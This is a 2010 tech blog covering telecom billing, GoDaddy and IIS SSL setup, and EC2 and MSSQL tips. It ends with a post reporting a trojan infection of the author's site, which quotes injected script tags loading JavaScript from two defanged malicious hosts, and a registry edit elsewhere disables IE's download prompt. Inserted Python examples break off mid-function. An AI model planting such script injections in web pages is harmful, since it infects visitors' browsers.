Wednesday, October 13, 2010

How large telecom companies and banks make sure you won't see how much you pay on your monthly bill - or - how to control your monthly expenses

Telecom companies have a motto: customers shouldn't notice the money leaving their account.

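It starts with billing by standing order (direct debit),
and it ends with the "green trend" of "let's save paper", where you get an electronic invoice by email.
The catch is that the invoice in the email is not an invoice! It is a link to the login page of the company's website, where you have to enter a username and password to get into your personal portal, and from there you have to hunt for the link to the invoice.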

Orange and Bezeq went even further: Orange also sends you an SMS with a code to your mobile every time, which you must enter on the site in order to log in (it is easier to get into the Shin Bet's portal), and Bezeq deployed the 6-8 character password trick - a well-known trick that makes you create a special password just for their site, different from the regular password you use for all the unimportant sites, because you have a maximum of 8 characters and a minimum of 6. Then of course you don't remember the password and you give up on the whole complicated business of seeing how much your monthly bill came to.
I once wrote a free program that logs in automatically to all such sites for you and sends you a free SMS at the start of each day with your up-to-date bill. In my opinion this is the solution for all the variable-expense companies - cellular, landline domestic and international communications, and the credit card companies. When you see on a daily basis how much you are spending, it surprises you less at the end of the month and it is easier to control the outcome. It is no coincidence that all the consumer shows recommend that people who find it hard to manage monthly expenses cancel their credit cards and work with cash.

I stopped maintaining the program after a few sites changed their login method, and then I took it off the internet - I need to find time to get back to it and fix it up again.

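Bank overdraft is exactly the same thing: "let's not have every customer sign for every loan; instead we'll open the door to 'automatic' loans at an outrageous interest rate that is always higher than the rate on a loan you would take by specific request - every time a customer goes into overdraft we'll give him such a loan, and there is no need to inform him either. And oh yes... I almost forgot... we'll also charge him a minimum fee unrelated to the size of the overdraft, on top of the interest, so that it pays off for us, the banks, even more."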

A few years ago a law was passed against this phenomenon, because the banks could avoid setting you a limit on the overdraft level. If I were a bank trying to make money from everything, I wouldn't limit people to an overdraft of 5000, I would give them 20000 too; what do I care, it is really a loan that I give at 15% interest (as long as I think you will be able to pay it, of course). The law stated that every citizen must set in advance with the bank, in a signed agreement, the overdraft or credit amount that the bank will provide, and the bank is obliged not to exceed this amount. So what was the problem? Ahead of the final vote on the law, the banks' lobby pressed for and got a clause saying that, if the banks so wish, they may choose not to reject payment commitment requests beyond the agreed amount, all at their own discretion... This effectively means that if you signed for a credit limit of 0 (or didn't sign at all, which is the same thing), then if your balance is plus one shekel and a standing order or a credit card charge of 1000 NIS arrives, the bank may still give you the 1000 as a loan, but at an especially excessive interest rate because it is above what you agreed with it in advance. How lovely: instead of sending the credit card company a letter saying there is no money for them in the account and handing them the blow, which they will then pass on to you and which will teach you how to manage your money properly (go and take a loan from the bank in advance when you know you will exceed what you have, and then also get a much lower interest rate), they do exactly the opposite! And rip you off even more.

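Another example of the above: the "Multi" credit card that lets you "control your expenses" is in practice simply a draconian version of overdraft. If we sum up how it works in one sentence it looks like this: the card is like a regular credit card, except that a fixed amount is debited at the end of the month (ideally, and by default, this amount will be as low as possible); everything that is not debited is treated as if you took a loan from the credit card company at an interest rate approaching 20% (!!!), which is a rate bordering on the grey market; and in addition we will try in every possible way, using the methods described at the start of my post, to make it hard for the customer to see how much he spends each month, how much turns into a loan and how much is debited at the end of the month.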

My recommendation: withdraw 1000-1500 NIS in cash each week and use it as much as possible instead of a credit card (sometimes, for example with special offers, a credit card is better, but that is not most cases). In addition, prefer to receive invoices by regular mail.

Monday, October 11, 2010

Orange mobilink lite annoying bug and how to avoid reboot





A very annoying bug with the mobilink cellular modem for laptops is that sometimes you insert it and it won't bring up the connect screen shown above. There is a mobilink icon in the taskbar at the bottom, but it can't be maximized to show the connect button. It also can't be closed, even through the quick launch item.

Usually you need to reboot to connect to the internet.

A quick solution is to take out the cellular modem card, press ctrl-shift-esc and select the process 'Lite' and then do 'end process'. Now when you insert your mobilink card again it will bring up the screen without rebooting.

Tuesday, October 5, 2010

Current technology comparison HTML5 vs. Flash (developer point of view)


Check out this new in-depth article on the current state of HTML5 vs. Flash, reviewing different use cases and showing current statistics across desktop and mobile platforms:

http://www.visionmobile.com/blog/2010/09/the-flash-vs-html5-endgame/

The article also shows the different options available to developers who need to choose between these two technologies.

Here is another article, written by a Flash programmer who tried to convert his Flash application to HTML5 and succeeded - see what he has to say about it here:

http://www.neuroproductions.be/experiments/trying-html5-as-flash-developer/

Finally, a great HTML5 online game:

http://www.benjoffe.com/code/games/torus/

Monday, October 4, 2010

How to set a new/transferred domain to point to a dedicated server on godaddy

As usual, the simplest tasks are the hardest on godaddy servers.
When you register a new domain or transfer an existing domain from another registrar to godaddy, you probably want to point that domain to your hosting service (an existing hosting server on godaddy or elsewhere).

By default, after transferring a domain to godaddy, the nameservers stay what they were before - you want to use godaddy nameservers and add an "A" record to point to your hosted server.

To do this you first need to perform a temporary step and 'park' your domain with godaddy; this changes the nameservers used by your domain to godaddy nameservers.
(select your domain and choose 'nameservers' -> 'set nameservers' -> choose the park option)

After this you will be able to access the "Total DNS" control panel for your domain, and there you can add an 'A' record to point the domain to your hosting server (the web server) IP address. You can also create a wildcard subdomain to point to your web server.
[select your domain or refresh the domain page you were on before; near 'Total DNS' click 'Total DNS control'. There you will have a single A record pointing '@' to the parked IP address - edit it and change it to your web server's IP, and optionally add more A records for other subdomains you want to reference (e.g. www.mydomain.com, sub2.mydomain.com, etc ...). You can also add an A record for a wildcard subdomain *.mydomain.com to point to your web server, but then check out my wildcard article for the IIS configuration needed: http://me-ol-blog.blogspot.com/2010/09/wildcard-domain-problems-with-iis-607x.html ]

Sunday, October 3, 2010

Can't restore MSSQL database problem

This is a problem I encounter so many times.

Errors like database is locked or there are existing locks or cannot get exclusive access to the database always give me headaches and don't let me restore a DB over an existing one.

There are many complex solutions that deal with killing processes in the DB and moving it to single user mode - which tend to be very cumbersome and not always possible.

The simple solution is: if you manage to take your DB offline and delete it, you can restore your DB.
And usually you can take the DB offline and delete it once all connections are disconnected, which you can do by just restarting the MSSQL service in the Windows service manager.

Tuesday, September 28, 2010

Using Watin to download files automatically

When using Watin, you can click on a link automatically or go to a download URL and save a file automatically using something similar to:


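// Needs: using WatiN.Core; using WatiN.Core.DialogHandlers;
// featureCode2AnnouncementWavPath is the full local path the downloaded file is saved to
FileDownloadHandler fileDownloadHandler = new FileDownloadHandler(featureCode2AnnouncementWavPath);
browser.AddDialogHandler(fileDownloadHandler); // register the handler object itself, not a file name
browser.GoTo("http://www.mydomain.com/file.zip"); // OR: browser.Link(Find.ById("download_button")).Click();
fileDownloadHandler.WaitUntilFileDownloadDialogIsHandled(15); // timeout in seconds
fileDownloadHandler.WaitUntilDownloadCompleted(20); // timeout in seconds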

But IE will typically show a notification bar warning of the type:
"IE has blocked site from downloading files to my computer" and then Watin will not download the file.


The only solution for IE8 that I found for this is to edit the registry and disable this prompting:


HKEY_LOCAL_MACHINE (or HKEY_CURRENT_USER)
     SOFTWARE
          Microsoft
               Internet Explorer
                    Main
                         FeatureControl
                              FEATURE_RESTRICT_FILEDOWNLOAD
                                   iexplore.exe = 0x00000000


Currently, I manage to save a file using this method, but for some reason the code stops after clicking the save button and then times out with an exception:


 "Timeout while Internet Explorer state not complete"




I will update if I ever manage to solve this issue (it currently went down in priority)

Sunday, September 26, 2010

Wildcard domain problems with IIS 6.0/7.X

Today, when you want a wildcard domain to point to your site you need to do 2 things:
1) add a wildcard A record to your DNS:
   *.mydomain.com              188.188.2.97

2) add a wildcard entry to your IIS web site:
IIS control panel->right click on your web site-> properties->"web site" tab->advanced

Here you "Add" a site with an empty host header value.

This is the method to send all undefined host web server requests to this site.

For example:
If you have a few web sites defined in IIS (on the same web site node or on different nodes, it doesn't matter) - for instance, foo.mydomain.com & bar.mydomain.com (these are defined with foo.mydomain.com, bar.mydomain.com host headers) - then when you define an additional 3rd value with an empty host header value on the same port, all other requests will go there (x.mydomain.com / www.x.mydomain.com / etc ...).
This is like defining one global wildcard per IIS instance.

This is the only way wildcards can be defined for your web site, and if you want to host multiple wildcard domains on the same IIS machine (e.g., *.mydomain.com and *.someotherdomain.com) you can't ! because the wildcard is a global one "*" and not part of a domain ("*.domain.com").

There are tricks to circumvent this problem (ISAPI-Rewrite), but they are complicated, and the Microsoft IIS dev team is aware this is a problem (http://forums.iis.net/t/1095760.aspx), but they haven't provided this feature yet, not even in IIS 7.

There are even commercial products that were built to provide an answer to this problem.

One side note - in apache this is not a problem.
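A small model of the behaviour described above, added here as an example and not IIS code: `select_site` picks a site the way the post describes (exact host header, otherwise the empty-host-header binding on that port), and `route_catch_all` shows how the catch-all site itself can tell `*.mydomain.com` from `*.someotherdomain.com` and refuse any other Host value. Site names, tenant names and the sample bindings are hypothetical.

```python
import re
from typing import NamedTuple, Optional


class Binding(NamedTuple):
    site: str
    port: int
    host_header: str  # "" is the empty host header value (the global catch-all)


# One DNS label, and a host name made of at least two labels.
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
VALID_HOST = re.compile(rf"{LABEL}(?:\.{LABEL})+")


def normalize_host(host_header_value: str) -> str:
    """Lower-case the Host header value and drop an optional :port and trailing dot."""
    host = host_header_value.strip().lower()
    if ":" in host:
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".")


def select_site(bindings, port: int, host_header_value: str) -> Optional[str]:
    """Exact host header match wins; otherwise the empty-host-header binding on that port."""
    host = normalize_host(host_header_value)
    fallback = None
    for b in bindings:
        if b.port != port:
            continue
        if b.host_header.lower() == host:
            return b.site
        if b.host_header == "":
            fallback = b.site
    return fallback


def route_catch_all(host_header_value: str, wildcard_roots) -> Optional[str]:
    """Inside the catch-all site: map the Host value to a tenant by parent domain.

    Returns None for anything that is not a well-formed name under one of the
    configured roots; the caller should answer such requests with an error,
    because the catch-all binding receives every Host value a client sends.
    """
    host = normalize_host(host_header_value)
    if not VALID_HOST.fullmatch(host):
        return None
    for root, tenant in wildcard_roots.items():
        if host.endswith("." + root):  # the leading dot stops "notmydomain.com"
            return tenant
    return None


# Constructed sample configuration (hypothetical names).
SAMPLE_BINDINGS = [
    Binding("foo-site", 80, "foo.mydomain.com"),
    Binding("bar-site", 80, "bar.mydomain.com"),
    Binding("catch-all", 80, ""),
]
SAMPLE_ROOTS = {
    "mydomain.com": "mydomain-app",
    "someotherdomain.com": "someotherdomain-app",
}

if __name__ == "__main__":
    for h in ("foo.mydomain.com", "x.mydomain.com", "www.x.someotherdomain.com",
              "mydomain.com.other.example"):
        site = select_site(SAMPLE_BINDINGS, 80, h)
        tenant = route_catch_all(h, SAMPLE_ROOTS) if site == "catch-all" else "-"
        print(f"{h:32} site={site:10} tenant={tenant}")
```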

Sunday, September 12, 2010

Mobile application signing schemes: Symbian, iPhone, Android



http://lonelybob.vox.com/library/post/mobile-app-signing-security-android-vs-iphone-vs-symbian.html

The link above contains a great article that compares the 3 schemes used today by Symbian, iPhone & Android.

Quick summary (and some extra info):

Symbian S60 3rd: C++ (tweaked). Requires a certificate from the Symbian company for apps to run on the phone - costs money and testing time - biggest hassle. Also, different API levels require different signature levels and costs (2nd ed. and lower were open).

iPhone: Objective C (Apple only development: "Cocoa" IDE). Allows you to do your own signing - but it will work only on up to 100 phones. You need to join a special program for a better signature and for appearing on the app store.

Android: Java (runs a separate JVM on the phone for each app). Allows you to self-sign, and it will work fine on all phones and can be distributed.

I believe that the path Android chose (developer can sign his own apps and they will work on the actual phone) will be the winning choice ! We will wait and see ...

Monday, September 6, 2010

MSSQL why not always define varchar and nvarchar as max in length ...

Table storage wise, there is no difference in storage space used when a 4 char string is stored in varchar(10) or varchar(1000) ... it will use the same space on the disk (it stores the 4 char string plus 2 bytes for the length).

The only difference will be if there is an index built on the field, then the index space used for varchar(1000) will be larger than the index used for varchar(10).

Friday, September 3, 2010

Self-employed software freelancer who also works by the hour? You need a rate that covers holiday time

When you calculate how much to ask for as a freelancer - if the contract is not a global (fixed monthly) one, you need to take into account holiday periods for which salaried employees get paid and you don't ...

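For example, if 100% is what a salaried employee gets gross, you should add:

National Insurance (the employer pays 5% for the employee - and a self-employed person has to pay the full 16%): 5%
Equivalent of the employer's pension contribution for an employee: 5%
Equivalent of the employer's contribution to a study fund (keren hishtalmut): 7.5%
Employer's severance pay provision for an employee: 8.33%
An employee's vacation days, about 20 out of 250 working days a year in total: 8%
Convalescence pay (dmei havra'a), 6 days a year: 2.2%
Sick days - say 5 full days a year: 2%
Holidays, about 10 working days out of 250: 4%

Total: 42%

So if, for example, you are offered 20,000 as an employee, then as a freelancer you should ask for 28,400.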

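Note one more thing - as a self-employed person you take an additional 8.33% equivalent to severance pay, but as self-employed you will pay full tax and National Insurance on it (compared to an employee, who is exempt from tax altogether up to the first 11,000 NIS for each year worked), so you can easily add another 8.33% to even things out. And that gives us a bottom line of 50% above the salary you would get if you were not self-employed.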
 

Wednesday, July 21, 2010

MySQL Workbench install annoyance - you have to have windows firewall service running

When you try to install MySQL workbench on an Amazon EC2 server you receive a "cannot connect to firewall" error which causes the setup to fail.

I assume this is because setup wants to set FW exceptions, but of course Amazon EC2 servers have the firewall service disabled because they programmatically implement the firewall using the AWS control panel.

So to solve this you need to enable the firewall service, start it, run the setup, stop the service and again disable it.

Wednesday, July 14, 2010

How to install IIS on amazon EC2

When you enter your EC2 instance and want to add IIS [ via the add/remove programs -> add/remove windows components -> Application Server (double click) ... ], the server will ask you for a directory of installation files: convlog.exe on Service Pack 2 CD-ROM
and gives you a default directory such as: C:\sysprep\i386\i386

This directory doesn't exist, you need to mount a special snapshot EBS volume.
This can be done in 2 methods:

1) GUI method :
  1.1) (if you previously created the correct volume - skip to step 1.3) Go to the EC2 control panel (in AWS), click Elastic Block Storage -> Snapshots, filter by All snapshots.

Select the correct (matching your running EC2 instance configuration) snapshot:

The following is a list of available snapshots for US:
  • Windows 2003 R2 Enterprise 32-bit: snap-bb10f6d2
  • Windows 2003 R2 Datacenter 32-bit: snap-8010f6e9
  • Windows 2003 R2 Enterprise 64-bit: snap-d010f6b9
  • Windows 2003 R2 Datacenter 64-bit: snap-a310f6ca

The following is a list of available snapshots for EU:
  • Windows 2003 R2 Enterprise 32-bit: snap-a4bb5ecd
  • Windows 2003 R2 Datacenter 32-bit: snap-b8bb5ed1
  • Windows 2003 R2 Enterprise 64-bit: snap-a6bb5ecf
  • Windows 2003 R2 Datacenter 64-bit: snap-babb5ed3 
  1.2)  Right click the correct snapshot and 'Create Volume From Snapshot' - make sure you use a region that is exactly the same region as your instance (up to the last letter - e.g., "us-east-1b" - the 'b' is important !)
This step may take 10-15 minutes.

  1.3) Go to Elastic Block Storage -> Volumes, wait until the volume is created (status column), then right click it and select 'attach volume'. If you used the correct region, the combo box in the following dialog should allow you to select your image. Choose a drive and click OK.

The CDROM will be mounted on a new drive on your running EC2 instance (no need to close the running session during this procedure).

Locate the i386 directory on that drive and continue the installation process of IIS as described at the beginning of the blog post.

2) Command line method:
Using the amazon API Tools, follow the instructions here. You will need to install java & set the EC2_HOME and JAVA_HOME env variables before running the API Tools on your computer and you will need your private key too (login to this page for your private key info or in AWS panel go to 'account' -> 'Security Credentials' ).

Wednesday, July 7, 2010

How to access GoDaddy PIX firewall for dedicated servers (java problem)

It turns out that you cannot access the godaddy PIX firewall using the latest java, because the PIX control panel uses deprecated java functionality, so you need to downgrade your java. Following are steps on how to do this without uninstalling the latest java version you have:

You'll need to use java version 1.6.0_11 or older. Newer versions are not compatible with the Pix Device Manager.

You can install a second version of Java. And when you need to access the firewall you can disable the newer version.
Go to:
http://java.sun.com/products/archive/ and download an appropriate version.
Once installed navigate to Start > Control Panel > Java > Java > Uncheck all other versions > Ok.

Multiple SSL/HTTPS web sites on one IIS server

An SSL certificate can be attached only to a physical IP address – so if you have multiple web sites with different host names on the same server and you want them all to be secure (SSL/HTTPS) then you need one of the 2 following scenarios:

1. A ‘wildcard’ SSL certificate (e.g., *.foo.com) which costs more, ~$200/year.
If you choose this solution, the certificate needs to be installed on all web site nodes in the IIS admin and further command line functions need to be done (see http://blumenthalit.net/blog/Lists/Posts/Post.aspx?List=35b60df2-0af2-4e52-8c6f-d3a64a542f45&ID=14&RootFolder=* for more details)


2. If you have separate different certificates each one for a different host name (e.g., one for site1.foo.com and the other for site2.foo.com) , you will need to add IP addresses (GoDaddy say they must be real IPs, other web sites claim internal NAT IPs can be enough) – the dedicated control panel can be used for issuing a new “real IP” (up to 3 are given), the godaddy firewall needs to be configured for this new IP and the dedicated host needs to be configured for it too.
[note that accessing the godaddy PIX firewall for a dedicated server requires you to downgrade your java because the latest java can't access the control panel - I will add a post for this too]
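To see which host names one wildcard certificate actually covers and how many IP addresses the two scenarios need, here is an added example (not from the original post or from GoDaddy). It assumes the common rule that `*` stands for exactly one left-most label and the post's rule of one certificate per IP address; the host names and the `plan_https_sites` helper are hypothetical.

```python
from typing import Dict, List, Tuple


def cert_name_matches(pattern: str, hostname: str) -> bool:
    """True if a certificate name covers hostname.

    '*' is honoured only as the whole left-most label and matches exactly one
    label, so '*.foo.com' covers site1.foo.com but neither foo.com nor
    a.b.foo.com. Partial-label wildcards (e.g. 'www*') never match here.
    """
    p = pattern.lower().rstrip(".").split(".")
    h = hostname.lower().rstrip(".").split(".")
    if len(p) != len(h) or "" in h:
        return False
    if p[0] == "*":
        # Refuse wildcards directly under a top-level label such as '*.com'.
        return len(p) >= 3 and p[1:] == h[1:]
    return p == h


def plan_https_sites(site_hosts: List[str],
                     cert_names: List[str]) -> Tuple[Dict[str, List[str]], List[str], int]:
    """Group HTTPS sites by the certificate that covers them.

    Returns (sites per certificate in use, sites with no matching certificate,
    number of IP addresses needed when each certificate sits on its own IP).
    """
    # Try exact names before wildcard names so a dedicated certificate wins.
    ordered = sorted(cert_names, key=lambda c: c.startswith("*"))
    by_cert: Dict[str, List[str]] = {c: [] for c in cert_names}
    uncovered: List[str] = []
    for host in site_hosts:
        match = next((c for c in ordered if cert_name_matches(c, host)), None)
        if match is None:
            uncovered.append(host)
        else:
            by_cert[match].append(host)
    used = {c: hosts for c, hosts in by_cert.items() if hosts}
    return used, uncovered, len(used)


# Constructed sample: sites on one IIS server and the certificates on hand.
SAMPLE_SITES = ["site1.foo.com", "site2.foo.com", "a.b.foo.com", "foo.com", "shop.bar.com"]
SAMPLE_CERTS = ["*.foo.com", "shop.bar.com"]

if __name__ == "__main__":
    used, uncovered, ips = plan_https_sites(SAMPLE_SITES, SAMPLE_CERTS)
    for cert, hosts in used.items():
        print(f"{cert:14} -> {', '.join(hosts)}")
    print("no certificate:", ", ".join(uncovered))
    print("IP addresses needed:", ips)
```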

I got mail from their support detailing the steps for scenario #2 above:

To request additional IP addresses:



  1. Log into your Account Manager.

  2. Under the My Products section, select Servers.

  3. Click Launch Manager next to the server account that you would like to manage. The virtual Dedicated/Dedicated Hosting Manager opens in a new window.

  4. Click Request Additional IP and allow the system several minutes for the IP address to be allocated.


NOTE: If you use Parallels Plesk Panel, the new IP address will need to be re-read from the Parallels Plesk Panel under Server > IP Addresses. Without Parallels Plesk Panel, you will need to add your IP addresses to your server's IP address pool through the applicable means before it will work.


Additional IP addresses past the first three cost extra.


Before we can allocate additional IP addresses to your server, we will need the following information submitted in a trouble ticket:



  1. How many additional IP addresses you would like us to allocate to your server (up to 3 at a time).

  2. The reason that you need additional IP addresses.

  3. The host name for your server.

  4. The last 4 digits of the payment method on file that you want to use.


Once you have requested another IP address, you would need to add the IP address to your server, there are instructions for this here : http://help.godaddy.com/article/1478. You would also need to add the IP translation rules to your firewall on the server.

Some of the information in this article is advanced material we make available as a courtesy. Please be advised that you are responsible for properly following the procedures below. Customer Support cannot assist with these topics.


Translation rules must be added for all new IP addresses. When the Cisco PIX 501 hardware firewall is installed, the translation rules for existing IP addresses are created automatically.


For each new IP address, you create two static translation rules, one for outside traffic and one for inside traffic.


NOTE: For this example, we will use 22.33.44.55 to represent the new IP address. It is assumed that the next available internal IP address is 10.0.0.2.


To Add an IP Address to the Cisco PIX 501 Firewall



  1. In a Web browser, navigate to: https://[your firewall management IP address]/

  2. You may receive a number of security certificate warnings. If you accept the certs and save them as "Trusted," you will avoid warnings in the future.

  3. Enter your User name and Password, and then click OK.

    NOTE: Your browser must have Java enabled and allow pop-ups from your firewall management IP.



  4. In the Device Manager toolbar, click the Configuration icon.

  5. Click the Translation Rules tab.

  6. Click the Translation Rules radio button.

  7. Click the New Rule icon.

  8. In the window, enter the following information:

    • Interface: Inside

    • IP Address: 10.0.0.2

    • Mask: 255.255.255.255

    • Translate address on interface: outside

    • Translate address to: select (x) static IP Address: 22.33.44.55



  9. Click the New Rule icon.

  10. In the window, enter the following information:

    • Interface: Outside

    • IP Address: 22.33.44.55

    • Mask: 255.255.255.255

    • Translate address on interface: inside

    • Translate address to: select (x) static IP Address: 10.0.0.2



  11. Add 10.0.0.2, the internal IP address, to your server.


    • Windows In the advanced section of your local area network TCP/IP settings, add the internal IP, using the 255.255.255.0 netmask.


    • Linux At root, copy "/etc/sysconfig/network-scripts/ifcfg-eth0" to "/etc/sysconfig/network-scripts/ifcfg-eth0:0". Edit /etc/sysconfig/network-scripts/ifcfg-eth0:0 changing the IP to the new IP and change the DEVICE to equal eth0:0. Restart your networking with: service network restart




NOTE: IP address allocation is monitored. Attempting to add IP addresses to your server that have not been purchased is a violation of your terms of service agreement and may result in the suspension of your account.



Once these steps have been completed, we would be able to install the second IP address on your server for you.

How to implement HTTPS / SSL on IIS 6.0 web servers

You need to buy a certificate signed by a trusted certificate authority (trusted by your browsers) or by an authority which also has an 'intermediate certificate bundle' (which traces that authority up to the root CA authorities which are trusted by your browsers).

The example below explains how to do it with a GoDaddy certificate and a GoDaddy dedicated server:

When buying a new certificate or downloading an existing one (from GoDaddy account) you receive a zip file that contains the certificate (.crt) and an intermediate certificate (.p7b)

The certificate is a certificate signed by GoDaddy, and the intermediate certificate is a ‘chain certificate’ that shows who signed the GoDaddy certificate, and who signed that one, on and on up to the root certificate authority (this is needed because GoDaddy itself is not trusted by Firefox browsers, only by IE).

In order to download the certificate from GoDaddy, you need to initiate a request from the web site on IIS:

Taken from http://help.godaddy.com/topic/746/article/5277 :

Follow the below instructions to generate a CSR for your website. When you have completed generating your CSR, cut/copy and paste it into the CSR field on the SSL certificate-request page.

NOTE: You must have at least Service Pack 1 installed before generating a CSR.

To Generate and Submit the Certificate Signing Request (CSR)

1. Open the Administrative Tools menu (right click on My Computer; select Manage or Control Panel; select Administrative Tools.)

2. Select Internet Information Services.

3. Select the computer and website (host) that you wish to secure. Right click and select Properties.

4. Click the Directory Security tab.

5. Click the Server Certificate button (located in the Secure communications area).

6. Click Next in the Welcome to the Web Server Certificate Wizard window.

7. Select Create a new certificate; then click Next.

8. Select Prepare the request now, but send it later and click Next.

9. In the Name and Security Settings window, fill in the name field for the new certificate; then select the bit length (2048 or higher). Click Next.

10. Enter your Distinguished Name field information. The following characters cannot be accepted:

< > ~ ! @ # $ % ^ * / \ ( ) ? &.

11. Complete the Distinguished Name Fields:

o Organization - The name under which your business is legally registered. The listed organization must be the legal registrant of the domain name in the certificate request. If you are enrolling as an individual, please enter the certificate requestor's name in the "Organization" field, and the DBA (doing business as) name in the "Organizational Unit" field.

o Organizational Unit - Optional. Use this field to differentiate between divisions within an organization. For example, "Engineering" or "Human Resources." If applicable, you may enter the DBA (doing business as) name in this field.

o Common Name - The Common Name is the fully-qualified domain name - or URL - for which you plan to use your certificate, e.g., the area of your site you wish customers to connect to using SSL. For example, an SSL certificate issued for "www.yourcompanyname.com" will not be valid for "secure.yourcompanyname.com." If the Web address to be used for SSL is "secure.yourcompanyname.com," ensure that the common name submitted in the CSR is "secure.yourcompanyname.com."

NOTE: If you are requesting a Wildcard certificate, please add an asterisk (*) on the left side of the Common Name (e.g., "*.coolexample.com" or "www*.coolexample.com"). This will secure all subdomains of the Common Name.

o Country - The two-letter International Organization for Standardization- (ISO-) format country code for the country in which your organization is legally registered.

o State/Province - Name of state or province where your organization is located. Please enter the full name. Do not abbreviate.

o City/Locality - Name of the city in which your organization is registered/located. Please spell out the name of the city. Do not abbreviate.

12. Enter your Administrator contact information.

13. Enter a path and file name for the CSR.

14. Verify the information in the request and click Next.

15. On the Completing the Web Server screen, click Finish.

16. Open the generated CSR file; then, using a plain-text editor, such as Windows Notepad, copy and paste the CSR into our online enrollment form.

Now you can download the certificate zip file by accessing the SSL in “my products” of godaddy, selecting a certificate and choosing ‘rekey’ and giving the dialog your CSR.

Install both the certificate (.crt) and the intermediate certificate (.p7b) according to this site:

http://help.godaddy.com/topic/742/article/4875

After your certificate request is approved, you can download your SSL and intermediate certificate from within the SSL application. For more information see Downloading Your SSL Certificate. Both of these files must be installed on your Web server.

You may also download the intermediate certificate from the repository.

To Install the Intermediate Certificate Bundle

1. Click the Start menu and click Run.... Type mmc in the Run window and click OK to start the Microsoft Management Console (MMC).

2. In the Management Console, select File then Add/Remove Snap In.

3. In the Add or Remove Snap-ins dialog, click the Add button and then select Certificates.

4. Choose Computer Account then click Next.

5. Choose Local Computer, then click Finish.

6. Close the Add or Remove Snap-ins dialog and click OK to return to the main MMC window.

7. If necessary, click the + icon to expand the Certificates folder so that the Intermediate Certification Authorities folder is visible.

8. Right-click on Intermediate Certification Authorities and choose All Tasks, then click Import.

9. Follow the wizard prompts to complete the installation procedure.

10. Click Browse to locate the certificate file. Change the file extension filter in the bottom right corner to be able to select the file. Click Open after selecting the appropriate file.

11. Click Next in the Certificate Import Wizard.

12. Choose Place all certificates in the following store; then use the Browse function to locate Intermediate Certification Authorities. Click Next. Click Finish.

NOTE: If the Go Daddy Class 2 Certification Authority root certificate is currently installed on your machine you will need to disable it from the Trusted Root Certification Authorities folder.

13. Expand the Trusted Root Certification Authorities folder

14. Double-click the Certificates folder to show a list of all certificates.

15. Find the Go Daddy Class 2 Certification Authority certificate.

16. Right-click on the certificate and select Properties.

17. Select the radio button next to Disable all purposes for this certificate.

18. Click OK.

19. Repeat steps 13 to 18, using Starfield Class 2 Certificate Authority as the certificate name to disable.

NOTE: Do not disable the Go Daddy Secure Certification Authority certificate located in the Intermediate Certification Authorities folder. Doing so will break the server, causing it to stop sending the correct certificate chain to the browser.

To Install the SSL Certificate

1. Select the Internet Information Service console within the Administrative Tools menu.

2. Select the website (host) for which the certificate was made.

3. Right mouse-click and select Properties.

4. Select the Directory Security tab.

5. Select the Server Certificate option.

6. The Welcome to the Web Server Certificate Wizard window opens. Click OK.

7. Select Process the pending request and install the certificate. Click Next.

8. Enter the location for the certificate file at the Process a Pending Request window. The file extension may be .txt or .crt instead of .cer (search for files of type all files).

9. When the correct certificate file is selected, click Next.

10. Verify the Certificate Summary to make sure all information is accurate. Click Next.

11. Select Finish.

And finally restart the “IIS admin service” from the windows services panel.
Note: If after this step the web server is marked as stopped (refresh with F5 to see it), it might mean you have another existing SSL web site on the same server – this is a special case and it will cause both web servers to stop functioning until one SSL certificate is removed from one of them (see my next post on multiple SSL/HTTPS web sites on one IIS server).

If you have more than one server with the same host name (like the case of multiple IPs for one DNS name for the sake of load balancing) -

Repeat this process for each server only this time, instead of initiating a request for each IIS, you should export the first certificate you installed to a .pfx file and import it on the other servers (the process will ask you to set a password for exporting and you will need to use the password for importing). Importing and exporting certificates is done in the certificate button in the properties of your web site.

Saturday, June 26, 2010

Could you believe I couldn't even put the trojan link in the post above .... here is the pic:

Wednesday, June 23, 2010

what a better reason for setting up a blog than a trojan ...

Yesterday morning, a trojan hit my www.taekwondo.org.il web site
and added a trojan that takes a javascript from this domain:

http://foxy .divarug . com:8080/Hardware.js

(added spaces intentionally)


and adds to js files this:




document.write('src="http://foxy . divarug . com:8080/Hardware.js">');



OR
to index.html adds:

[script] type="text/javascript" src="http://oployau . fancountblogger . com:8080/Debugger.js">[/script]



(used '[' instead of '<' - because blogger won't let me)


these pages were detected as an infected web site by Avast !

(I intentionally put spaces in the addresses so the page won't be blocked by lame site blockers)
now I have to go change all the pws and fix all the web site files again :\
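A cleanup check for the two injection shapes shown above, as an added example (not code from the original post): it walks a copy of the site's files and reports every script source that points at a host outside an allowlist, flagging non-standard ports such as the 8080 seen here. The allowlist, file suffixes and sample content are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path
from typing import NamedTuple
from urllib.parse import urlsplit

SCAN_SUFFIXES = {".js", ".html", ".htm", ".php", ".asp", ".aspx"}

# <script ... src="http://host/..."> (protocol-relative //host/... too)
SCRIPT_TAG = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']?(?P<url>(?:https?:)?//[^"'\s>\\]+)""", re.I)
# document.write( ... ) calls, then any src=URL inside the written string
DOC_WRITE = re.compile(r"document\.write\s*\((?P<arg>[^;]*?)\)", re.I | re.S)
SRC_IN_ARG = re.compile(
    r"""src\s*=\s*\\?["']?(?P<url>(?:https?:)?//[^"'\s>\\]+)""", re.I)


class Finding(NamedTuple):
    file: str
    line: int
    url: str
    host: str
    how: str        # "document.write" or "script tag"
    odd_port: bool  # True when the URL names a port other than 80/443


def check_text(name, text, allowed_hosts):
    """Return a Finding for each external script source not on the allowlist."""
    hits = {}  # absolute offset of the URL -> (url, how); the offset de-duplicates
    for w in DOC_WRITE.finditer(text):
        for m in SRC_IN_ARG.finditer(w.group("arg")):
            hits[w.start("arg") + m.start("url")] = (m.group("url"), "document.write")
    for m in SCRIPT_TAG.finditer(text):
        hits.setdefault(m.start("url"), (m.group("url"), "script tag"))
    findings = []
    for pos in sorted(hits):
        url, how = hits[pos]
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
            port = parts.port
        except ValueError:
            host, port = "", -1  # unparseable URL: report it rather than skip it
        if host in allowed_hosts:
            continue
        line = text.count("\n", 0, pos) + 1
        findings.append(Finding(name, line, url, host, how, port not in (None, 80, 443)))
    return findings


def scan_tree(root, allowed_hosts):
    """Run check_text over every web file under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
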